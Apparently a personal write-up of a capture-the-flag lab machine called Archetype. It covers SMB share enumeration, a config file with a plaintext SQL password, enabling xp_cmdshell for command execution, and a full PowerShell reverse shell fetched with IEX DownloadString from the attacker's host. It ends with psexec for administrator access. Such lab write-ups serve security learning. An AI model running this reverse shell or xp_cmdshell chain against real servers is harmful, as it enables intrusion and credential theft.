Lab - HackyHour0

• HackyHour0 - Entry

---

HackyHour0 - Entry

o$ nmap -sC -sV 10.10.10.27
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-13 21:29 EST
Error #487: Your port specifications are illegal.  Example of proper form: "-100,200-1024,T:3000-4000,U:60000-"
QUITTING!
(base) J:~ luo$ nmap -sC -sV 10.10.10.27
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-13 21:29 EST
Nmap scan report for 10.10.10.27
Host is up (0.031s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open  ms-sql-s     Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info:
|   Target_Name: ARCHETYPE
|   NetBIOS_Domain_Name: ARCHETYPE
|   NetBIOS_Computer_Name: ARCHETYPE
|   DNS_Domain_Name: Archetype
|   DNS_Computer_Name: Archetype
|_  Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2020-11-06T18:53:07
|_Not valid after:  2050-11-06T18:53:07
|_ssl-date: 2020-11-14T03:48:04+00:00; +1h18m29s from scanner time.
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h54m30s, deviation: 3h34m41s, median: 1h18m29s
| ms-sql-info:
|   10.10.10.27:1433:
|     Version:
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| smb-os-discovery:
|   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
|   Computer name: Archetype
|   NetBIOS computer name: ARCHETYPE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-11-13T19:47:59-08:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-11-14T03:47:56
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.01 seconds



$ nmap 10.10.10.27
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-13 21:32 EST
Nmap scan report for 10.10.10.27
Host is up (0.029s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1433/tcp open  ms-sql-s


# use smbclient to list available shares.
smbclient -N -L \\\\10.10.10.27\\

# a share called backups.
smbclient -N -L \\\\10.10.10.27\\backup


# dtsConfig file, which is a config file used with SSIS.
# it contains a SQL connection string, containing credentials for the local Windows user ARCHETYPE\sql_svc.
<DTSConfiguration>
 	<DTSConfigurationHeading>
 		<DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
 	</DTSConfigurationHeading>
 	<Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
 		<ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
 	</Configuration>
 </DTSConfiguration>


# connecting to the SQL Server using Impacket's mssqlclient.py.
mssqlclient.py ARCHETYPE\sql_svc@10.10.10.27 -windows-auth


# use the IS_SRVROLEMEMBER function to reveal whether the current SQL user has sysadmin (highest level) privileges on the SQL Server. This is successful, and we do indeed have sysadmin privileges.

# This will allow us to enable xp_cmdshell and gain RCE on the host. Let's attempt this, by inputting the commands below.

EXEC sp_configure 'Show Advanced Options', 1;
reconfigure;
sp_configure;
EXEC sp_configure 'xp_cmdshell', 1
reconfigure;
xp_cmdshell "whoami"


# The whoami command output reveals that the SQL Server is also running in the context of the user ARCHETYPE\sql_svc. However, this account doesn't seem to have administrative privileges on the host.

# to get a proper shell, and proceed to further enumerate the system.
# We can save the PowerShell reverse shell below as shell.ps1.

$client = New-Object System.Net.Sockets.TCPClient("10.10.14.3",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()


# Next, stand up a mini webserver in order to host the file.
python3 -m http.server 80


# stand up netcat listener on port 443
# use ufw to allow the call backs on port 80 and 443 to machine.
nc -lvnp 443
ufw allow from 10.10.10.27 proto tcp to any port 80,443

# We can now issue the command to download and execute the reverse shell through xp_cmdshell.
xp_cmdshell powershell "IEX (New-Object Net.WebClient).DownloadString(\"https://10.10.14.3/shell.ps1\");"


# A shell is received as sql_svc, and we can get the user.txt on their desktop.


# As this is a normal user account as well as a service account, it is worth checking for frequently access files or executed commands.
# to access the PowerShell history file.
type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt


# This reveals that the backups drive has been mapped using the local administrator credentials.
# use Impacket's psexec.py to gain a privileged shell.
psexec.py administrator@10.10.10.27


# now access the flag on the administrator desktop